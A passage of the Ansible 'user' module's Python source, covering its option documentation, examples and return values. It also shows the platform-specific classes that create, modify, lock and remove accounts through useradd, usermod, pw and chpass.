- Lock the password (usermod -L, pw lock, usermod -C).
- BUT implementation differs on different platforms, this option does not always mean the user cannot login via other methods.
- This option does not disable the user, only lock the password. Do not change the password in the same task.
- Currently supported on Linux, FreeBSD, DragonFlyBSD, NetBSD, OpenBSD.
type: bool
version_added: "2.6"
local:
description:
- Forces the use of "local" command alternatives on platforms that implement it.
- This is useful in environments that use centralized authentification when you want to manipulate the local users
(i.e. it uses C(luseradd) instead of C(useradd)).
- This requires that these commands exist on the targeted host, otherwise it will be a fatal error.
type: bool
default: no
version_added: "2.4"
profile:
description:
- Sets the profile of the user.
- Does nothing when used with other platforms.
- Can set multiple profiles using comma separation.
- To delete all the profiles, use C(profile='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
authorization:
description:
- Sets the authorization of the user.
- Does nothing when used with other platforms.
- Can set multiple authorizations using comma separation.
- To delete all authorizations, use C(authorization='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
role:
description:
- Sets the role of the user.
- Does nothing when used with other platforms.
- Can set multiple roles using comma separation.
- To delete all roles, use C(role='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
notes:
- There are specific requirements per platform on user management utilities. However
they generally come pre-installed with the system and Ansible will require they
are present at runtime. If they are not, a descriptive error message will be shown.
- On SunOS platforms, the shadow file is backed up automatically since this module edits it directly.
On other platforms, the shadow file is backed up by the underlying tools used by this module.
- On macOS, this module uses C(dscl) to create, modify, and delete accounts. C(dseditgroup) is used to
modify group membership. Accounts are hidden from the login window by modifying
C(/Library/Preferences/com.apple.loginwindow.plist).
- On FreeBSD, this module uses C(pw useradd) and C(chpass) to create, C(pw usermod) and C(chpass) to modify,
C(pw userdel) remove, C(pw lock) to lock, and C(pw unlock) to unlock accounts.
- On all other platforms, this module uses C(useradd) to create, C(usermod) to modify, and
C(userdel) to remove accounts.
seealso:
- module: authorized_key
- module: group
- module: win_user
author:
- Stephen Fromm (@sfromm)
'''
EXAMPLES = r'''
- name: Add the user 'johnd' with a specific uid and a primary group of 'admin'
user:
name: johnd
comment: John Doe
uid: 1040
group: admin
- name: Add the user 'james' with a bash shell, appending the group 'admins' and 'developers' to the user's groups
user:
name: james
shell: /bin/bash
groups: admins,developers
append: yes
- name: Remove the user 'johnd'
user:
name: johnd
state: absent
remove: yes
- name: Create a 2048-bit SSH key for user jsmith in ~jsmith/.ssh/id_rsa
user:
name: jsmith
generate_ssh_key: yes
ssh_key_bits: 2048
ssh_key_file: .ssh/id_rsa
- name: Added a consultant whose account you want to expire
user:
name: james18
shell: /bin/zsh
groups: developers
expires: 1422403387
- name: Starting at Ansible 2.6, modify user, remove expiry time
user:
name: james18
expires: -1
'''
RETURN = r'''
append:
description: Whether or not to append the user to groups
returned: When state is 'present' and the user exists
type: bool
sample: True
comment:
description: Comment section from passwd file, usually the user name
returned: When user exists
type: str
sample: Agent Smith
create_home:
description: Whether or not to create the home directory
returned: When user does not exist and not check mode
type: bool
sample: True
force:
description: Whether or not a user account was forcibly deleted
returned: When state is 'absent' and user exists
type: bool
sample: False
group:
description: Primary user group ID
returned: When user exists
type: int
sample: 1001
groups:
description: List of groups of which the user is a member
returned: When C(groups) is not empty and C(state) is 'present'
type: str
sample: 'chrony,apache'
home:
description: "Path to user's home directory"
returned: When C(state) is 'present'
type: str
sample: '/home/asmith'
move_home:
description: Whether or not to move an existing home directory
returned: When C(state) is 'present' and user exists
type: bool
sample: False
name:
description: User account name
returned: always
type: str
sample: asmith
password:
description: Masked value of the password
returned: When C(state) is 'present' and C(password) is not empty
type: str
sample: 'NOT_LOGGING_PASSWORD'
remove:
description: Whether or not to remove the user account
returned: When C(state) is 'absent' and user exists
type: bool
sample: True
shell:
description: User login shell
returned: When C(state) is 'present'
type: str
sample: '/bin/bash'
ssh_fingerprint:
description: Fingerprint of generated SSH key
returned: When C(generate_ssh_key) is C(True)
type: str
sample: '2048 SHA256:aYNHYcyVm87Igh0IMEDMbvW0QDlRQfE0aJugp684ko8 ansible-generated on host (RSA)'
ssh_key_file:
description: Path to generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: /home/asmith/.ssh/id_rsa
ssh_public_key:
description: Generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: >
'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC95opt4SPEC06tOYsJQJIuN23BbLMGmYo8ysVZQc4h2DZE9ugbjWWGS1/pweUGjVstgzMkBEeBCByaEf/RJKNecKRPeGd2Bw9DCj/bn5Z6rGfNENKBmo
618mUJBvdlEgea96QGjOwSB7/gmonduC7gsWDMNcOdSE3wJMTim4lddiBx4RgC9yXsJ6Tkz9BHD73MXPpT5ETnse+A3fw3IGVSjaueVnlUyUmOBf7fzmZbhlFVXf2Zi2rFTXqvbdGHKkzpw1U8eB8xFPP7y
d5u1u0e6Acju/8aZ/l17IDFiLke5IzlqIMRTEbDwLNeO84YQKWTm9fODHzhYe0yvxqLiK07 ansible-generated on host'
stderr:
description: Standard error from running commands
returned: When stderr is returned by a command that is run
type: str
sample: Group wheels does not exist
stdout:
description: Standard output from running commands
returned: When standard output is returned by the command that is run
type: str
sample:
system:
description: Whether or not the account is a system account
returned: When C(system) is passed to the module and the account does not exist
type: bool
sample: True
uid:
description: User ID of the user account
returned: When C(UID) is passed to the module
type: int
sample: 1044
'''
import errno
import grp
import calendar
import os
import re
import pty
import pwd
import select
import shutil
import socket
import subprocess
import time
from ansible.module_utils import distro
from ansible.module_utils._text import to_native, to_bytes, to_text
from ansible.module_utils.basic import load_platform_subclass, AnsibleModule
try:
import spwd
HAVE_SPWD = True
except ImportError:
HAVE_SPWD = False
_HASH_RE = re.compile(r'[^a-zA-Z0-9./=]')
class User(object):
"""
This is a generic User manipulation class that is subclassed
based on platform.
A subclass may wish to override the following action methods:-
- create_user()
- remove_user()
- modify_user()
- ssh_key_gen()
- ssh_key_fingerprint()
- user_exists()
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
SHADOWFILE = '/etc/shadow'
SHADOWFILE_EXPIRE_INDEX = 7
LOGIN_DEFS = '/etc/login.defs'
DATE_FORMAT = '%Y-%m-%d'
def __new__(cls, *args, **kwargs):
return load_platform_subclass(User, args, kwargs)
def __init__(self, module):
self.module = module
self.state = module.params['state']
self.name = module.params['name']
self.uid = module.params['uid']
self.hidden = module.params['hidden']
self.non_unique = module.params['non_unique']
self.seuser = module.params['seuser']
self.group = module.params['group']
self.comment = module.params['comment']
self.shell = module.params['shell']
self.password = module.params['password']
self.force = module.params['force']
self.remove = module.params['remove']
self.create_home = module.params['create_home']
self.move_home = module.params['move_home']
self.skeleton = module.params['skeleton']
self.system = module.params['system']
self.login_class = module.params['login_class']
self.append = module.params['append']
self.sshkeygen = module.params['generate_ssh_key']
self.ssh_bits = module.params['ssh_key_bits']
self.ssh_type = module.params['ssh_key_type']
self.ssh_comment = module.params['ssh_key_comment']
self.ssh_passphrase = module.params['ssh_key_passphrase']
self.update_password = module.params['update_password']
self.home = module.params['home']
self.expires = None
self.password_lock = module.params['password_lock']
self.groups = None
self.local = module.params['local']
self.profile = module.params['profile']
self.authorization = module.params['authorization']
self.role = module.params['role']
if module.params['groups'] is not None:
self.groups = ','.join(module.params['groups'])
if module.params['expires'] is not None:
try:
self.expires = time.gmtime(module.params['expires'])
except Exception as e:
module.fail_json(msg="Invalid value for 'expires' %s: %s" % (self.expires, to_native(e)))
if module.params['ssh_key_file'] is not None:
self.ssh_file = module.params['ssh_key_file']
else:
self.ssh_file = os.path.join('.ssh', 'id_%s' % self.ssh_type)
def check_password_encrypted(self):
# Darwin needs cleartext password, so skip validation
if self.module.params['password'] and self.platform != 'Darwin':
maybe_invalid = False
# Allow setting the password to * or ! in order to disable the account
if self.module.params['password'] in set(['*', '!']):
maybe_invalid = False
else:
# : for delimiter, * for disable user, ! for lock user
# these characters are invalid in the password
if any(char in self.module.params['password'] for char in ':*!'):
maybe_invalid = True
if '$' not in self.module.params['password']:
maybe_invalid = True
else:
fields = self.module.params['password'].split("$")
if len(fields) >= 3:
# contains character outside the crypto constraint
if bool(_HASH_RE.search(fields[-1])):
maybe_invalid = True
# md5
if fields[1] == '1' and len(fields[-1]) != 22:
maybe_invalid = True
# sha256
if fields[1] == '5' and len(fields[-1]) != 43:
maybe_invalid = True
# sha512
if fields[1] == '6' and len(fields[-1]) != 86:
maybe_invalid = True
else:
maybe_invalid = True
if maybe_invalid:
self.module.warn("The input password appears not to have been hashed. "
"The 'password' argument must be encrypted for this module to work properly.")
def execute_command(self, cmd, use_unsafe_shell=False, data=None, obey_checkmode=True):
if self.module.check_mode and obey_checkmode:
self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
else:
# cast all args to strings ansible-modules-core/issues/4397
cmd = [str(x) for x in cmd]
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def backup_shadow(self):
if not self.module.check_mode and self.SHADOWFILE:
return self.module.backup_local(self.SHADOWFILE)
def remove_user_userdel(self):
if self.local:
command_name = 'luserdel'
else:
command_name = 'userdel'
cmd = [self.module.get_bin_path(command_name, True)]
if self.force:
cmd.append('-f')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self):
if self.local:
command_name = 'luseradd'
else:
command_name = 'useradd'
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.seuser is not None:
cmd.append('-Z')
cmd.append(self.seuser)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
elif self.group_exists(self.name):
# use the -N option (no user group) if a group already
# exists with the same name as the user to prevent
# errors from useradd trying to create a group when
# USERGROUPS_ENAB is set in /etc/login.defs.
if os.path.exists('/etc/redhat-release'):
dist = distro.linux_distribution(full_distribution_name=False)
major_release = int(dist[1].split('.')[0])
if major_release <= 5:
cmd.append('-n')
else:
cmd.append('-N')
elif os.path.exists('/etc/SuSE-release'):
# -N did not exist in useradd before SLE 11 and did not
# automatically create a group
dist = distro.linux_distribution(full_distribution_name=False)
major_release = int(dist[1].split('.')[0])
if major_release >= 12:
cmd.append('-N')
else:
cmd.append('-N')
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.expires is not None:
cmd.append('-e')
if self.expires < time.gmtime(0):
cmd.append('')
else:
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
if not self.local:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def _check_usermod_append(self):
# check if this version of usermod can append groups
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
usermod_path = self.module.get_bin_path(command_name, True)
# for some reason, usermod --help cannot be used by non root
# on RH/Fedora, due to lack of execute bit for others
if not os.access(usermod_path, os.X_OK):
return False
cmd = [usermod_path, '--help']
(rc, data1, data2) = self.execute_command(cmd, obey_checkmode=False)
helpout = data1 + data2
# check if --append exists
lines = to_native(helpout).split('\n')
for line in lines:
if line.strip().startswith('-a, --append'):
return True
return False
def modify_user_usermod(self):
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
cmd = [self.module.get_bin_path(command_name, True)]
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
# get a list of all groups for the user, including the primary
current_groups = self.user_group_membership(exclude_primary=False)
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.expires is not None:
current_expires = int(self.user_password()[1])
if self.expires < time.gmtime(0):
if current_expires >= 0:
cmd.append('-e')
cmd.append('')
else:
# Convert days since Epoch to seconds since Epoch as struct_time
current_expire_date = time.gmtime(current_expires * 86400)
# Current expires is negative or we compare year, month, and day only
if current_expires < 0 or current_expire_date[:3] != self.expires[:3]:
cmd.append('-e')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
# Lock if no password or unlocked, unlock only if locked
if self.password_lock and not info[1].startswith('!'):
cmd.append('-L')
elif self.password_lock is False and info[1].startswith('!'):
# usermod will refuse to unlock a user with no password, module shows 'changed' regardless
cmd.append('-U')
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def group_exists(self, group):
try:
# Try group as a gid first
grp.getgrgid(int(group))
return True
except (ValueError, KeyError):
try:
grp.getgrnam(group)
return True
except KeyError:
return False
def group_info(self, group):
if not self.group_exists(group):
return False
try:
# Try group as a gid first
return list(grp.getgrgid(int(group)))
except (ValueError, KeyError):
return list(grp.getgrnam(group))
def get_groups_set(self, remove_existing=True):
if self.groups is None:
return None
info = self.user_info()
groups = set(x.strip() for x in self.groups.split(',') if x)
for g in groups.copy():
if not self.group_exists(g):
self.module.fail_json(msg="Group %s does not exist" % (g))
if info and remove_existing and self.group_info(g)[2] == info[3]:
groups.remove(g)
return groups
def user_group_membership(self, exclude_primary=True):
''' Return a list of groups the user belongs to '''
groups = []
info = self.get_pwd_info()
for group in grp.getgrall():
if self.name in group.gr_mem:
# Exclude the user's primary group by default
if not exclude_primary:
groups.append(group[0])
else:
if info[3] != group.gr_gid:
groups.append(group[0])
return groups
def user_exists(self):
try:
if pwd.getpwnam(self.name):
return True
except KeyError:
return False
def get_pwd_info(self):
if not self.user_exists():
return False
return list(pwd.getpwnam(self.name))
def user_info(self):
if not self.user_exists():
return False
info = self.get_pwd_info()
if len(info[1]) == 1 or len(info[1]) == 0:
info[1] = self.user_password()[0]
return info
def user_password(self):
passwd = ''
expires = ''
if HAVE_SPWD:
try:
passwd = spwd.getspnam(self.name)[1]
expires = spwd.getspnam(self.name)[7]
return passwd, expires
except KeyError:
return passwd, expires
except OSError as e:
# Python 3.6 raises PermissionError instead of KeyError
# Due to absence of PermissionError in python2.7 need to check
# errno
if e.errno in (errno.EACCES, errno.EPERM):
return passwd, expires
raise
if not self.user_exists():
return passwd, expires
elif self.SHADOWFILE:
# Read shadow file for user's encrypted password string
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
with open(self.SHADOWFILE, 'r') as f:
for line in f:
if line.startswith('%s:' % self.name):
passwd = line.split(':')[1]
expires = line.split(':')[self.SHADOWFILE_EXPIRE_INDEX] or -1
return passwd, expires
def get_ssh_key_path(self):
info = self.user_info()
if os.path.isabs(self.ssh_file):
ssh_key_file = self.ssh_file
else:
if not os.path.exists(info[5]) and not self.module.check_mode:
raise Exception('User %s home directory does not exist' % self.name)
ssh_key_file = os.path.join(info[5], self.ssh_file)
return ssh_key_file
def ssh_key_gen(self):
info = self.user_info()
overwrite = None
try:
ssh_key_file = self.get_ssh_key_path()
except Exception as e:
return (1, '', to_native(e))
ssh_dir = os.path.dirname(ssh_key_file)
if not os.path.exists(ssh_dir):
if self.module.check_mode:
return (0, '', '')
try:
os.mkdir(ssh_dir, int('0700', 8))
os.chown(ssh_dir, info[2], info[3])
except OSError as e:
return (1, '', 'Failed to create %s: %s' % (ssh_dir, to_native(e)))
if os.path.exists(ssh_key_file):
if self.force:
# ssh-keygen doesn't support overwriting the key interactively, so send 'y' to confirm
overwrite = 'y'
else:
return (None, 'Key already exists, use "force: yes" to overwrite', '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-t')
cmd.append(self.ssh_type)
if self.ssh_bits > 0:
cmd.append('-b')
cmd.append(self.ssh_bits)
cmd.append('-C')
cmd.append(self.ssh_comment)
cmd.append('-f')
cmd.append(ssh_key_file)
if self.ssh_passphrase is not None:
if self.module.check_mode:
self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
master_in_fd, slave_in_fd = pty.openpty()
master_out_fd, slave_out_fd = pty.openpty()
master_err_fd, slave_err_fd = pty.openpty()
env = os.environ.copy()
env['LC_ALL'] = 'C'
try:
p = subprocess.Popen([to_bytes(c) for c in cmd],
stdin=slave_in_fd,
stdout=slave_out_fd,
stderr=slave_err_fd,
preexec_fn=os.setsid,
env=env)
out_buffer = b''
err_buffer = b''
while p.poll() is None:
r, w, e = select.select([master_out_fd, master_err_fd], [], [], 1)
first_prompt = b'Enter passphrase (empty for no passphrase):'
second_prompt = b'Enter same passphrase again'
prompt = first_prompt
for fd in r:
if fd == master_out_fd:
chunk = os.read(master_out_fd, 10240)
out_buffer += chunk
if prompt in out_buffer:
os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
prompt = second_prompt
else:
chunk = os.read(master_err_fd, 10240)
err_buffer += chunk
if prompt in err_buffer:
os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
prompt = second_prompt
if b'Overwrite (y/n)?' in out_buffer or b'Overwrite (y/n)?' in err_buffer:
# The key was created between us checking for existence and now
return (None, 'Key already exists', '')
rc = p.returncode
out = to_native(out_buffer)
err = to_native(err_buffer)
except OSError as e:
return (1, '', to_native(e))
else:
cmd.append('-N')
cmd.append('')
(rc, out, err) = self.execute_command(cmd, data=overwrite)
if rc == 0 and not self.module.check_mode:
# If the keys were successfully created, we should be able
# to tweak ownership.
os.chown(ssh_key_file, info[2], info[3])
os.chown('%s.pub' % ssh_key_file, info[2], info[3])
return (rc, out, err)
def ssh_key_fingerprint(self):
ssh_key_file = self.get_ssh_key_path()
if not os.path.exists(ssh_key_file):
return (1, 'SSH Key file %s does not exist' % ssh_key_file, '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-l')
cmd.append('-f')
cmd.append(ssh_key_file)
return self.execute_command(cmd, obey_checkmode=False)
def get_ssh_public_key(self):
ssh_public_key_file = '%s.pub' % self.get_ssh_key_path()
try:
with open(ssh_public_key_file, 'r') as f:
ssh_public_key = f.read().strip()
except IOError:
return None
return ssh_public_key
def create_user(self):
# by default we use the create_user_useradd method
return self.create_user_useradd()
def remove_user(self):
# by default we use the remove_user_userdel method
return self.remove_user_userdel()
def modify_user(self):
# by default we use the modify_user_usermod method
return self.modify_user_usermod()
def create_homedir(self, path):
if not os.path.exists(path):
if self.skeleton is not None:
skeleton = self.skeleton
else:
skeleton = '/etc/skel'
if os.path.exists(skeleton):
try:
shutil.copytree(skeleton, path, symlinks=True)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
else:
try:
os.makedirs(path)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
# get umask from /etc/login.defs and set correct home mode
if os.path.exists(self.LOGIN_DEFS):
with open(self.LOGIN_DEFS, 'r') as f:
for line in f:
m = re.match(r'^UMASK\s+(\d+)$', line)
if m:
umask = int(m.group(1), 8)
mode = 0o777 & ~umask
try:
os.chmod(path, mode)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
def chown_homedir(self, uid, gid, path):
try:
os.chown(path, uid, gid)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
for f in files:
os.chown(os.path.join(root, f), uid, gid)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
# ===========================================
class FreeBsdUser(User):
"""
This is a FreeBSD User manipulation class - it uses the pw command
to manipulate the user database, followed by the chpass command
to change the password.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'FreeBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
SHADOWFILE_EXPIRE_INDEX = 6
DATE_FORMAT = '%d-%b-%Y'
def remove_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'userdel',
'-n',
self.name
]
if self.remove:
cmd.append('-r')
return self.execute_command(cmd)
def create_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'useradd',
'-n',
self.name,
]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.expires is not None:
cmd.append('-e')
if self.expires < time.gmtime(0):
cmd.append('0')
else:
cmd.append(str(calendar.timegm(self.expires)))
# system cannot be handled currently - should we error if its requested?
# create the user
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password in a second command
if self.password is not None:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
def modify_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'usermod',
'-n',
self.name
]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
if (info[5] != self.home and self.move_home) or (not os.path.exists(self.home) and self.create_home):
cmd.append('-m')
if info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
with open(self.SHADOWFILE, 'r') as f:
for line in f:
if line.startswith('%s:' % self.name):
user_login_class = line.split(':')[4]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.expires is not None:
current_expires = int(self.user_password()[1])
# If expiration is negative or zero and the current expiration is greater than zero, disable expiration.
# In OpenBSD, setting expiration to zero disables expiration. It does not expire the account.
if self.expires <= time.gmtime(0):
if current_expires > 0:
cmd.append('-e')
cmd.append('0')
else:
# Convert days since Epoch to seconds since Epoch as struct_time
current_expire_date = time.gmtime(current_expires)
# Current expires is negative or we compare year, month, and day only
if current_expires <= 0 or current_expire_date[:3] != self.expires[:3]:
cmd.append('-e')
cmd.append(str(calendar.timegm(self.expires)))
# modify the user if cmd will do anything
if cmd_len != len(cmd):
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password in a second command
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
# we have to lock/unlock the password in a distinct command
if self.password_lock and not info[1].startswith('*LOCKED*'):
cmd = [
self.module.get_bin_path('pw', True),
'lock',
self.name
]
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
return self.execute_command(cmd)
elif self.password_lock is False and info[1].startswith('*LOCKED*'):
cmd = [
self.module.get_bin_path('pw', True),
'unlock',
self.name
]
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
return self.execute_command(cmd)
return (rc, out, err)
class DragonFlyBsdUser(FreeBsdUser):
"""
This is a DragonFlyBSD User manipulation class - it inherits the
FreeBsdUser class behaviors, such as using the pw command to
manipulate the user database, followed by the chpass command
to change the password.
"""
platform = 'DragonFly'
class OpenBSDUser(User):
"""
This is a OpenBSD User manipulation class.
Main differences are that OpenBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'OpenBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None and self.password != '*':
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups_option = '-S'
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_option = '-G'
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append(groups_option)
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
userinfo_cmd = [self.module.get_bin_path('userinfo', True), self.name]
(rc, out, err) = self.execute_command(userinfo_cmd, obey_checkmode=False)
for line in out.splitlines():
tokens = line.split()
if tokens[0] == 'class' and len(tokens) == 2:
user_login_class = tokens[1]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.password_lock and not info[1].startswith('*'):
cmd.append('-Z')
elif self.password_lock is False and info[1].startswith('*'):
cmd.append('-U')
if self.update_password == 'always' and self.password is not None \
and self.password != '*' and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
class NetBSDUser(User):
"""
This is a NetBSD User manipulation class.
Main differences are that NetBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'NetBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
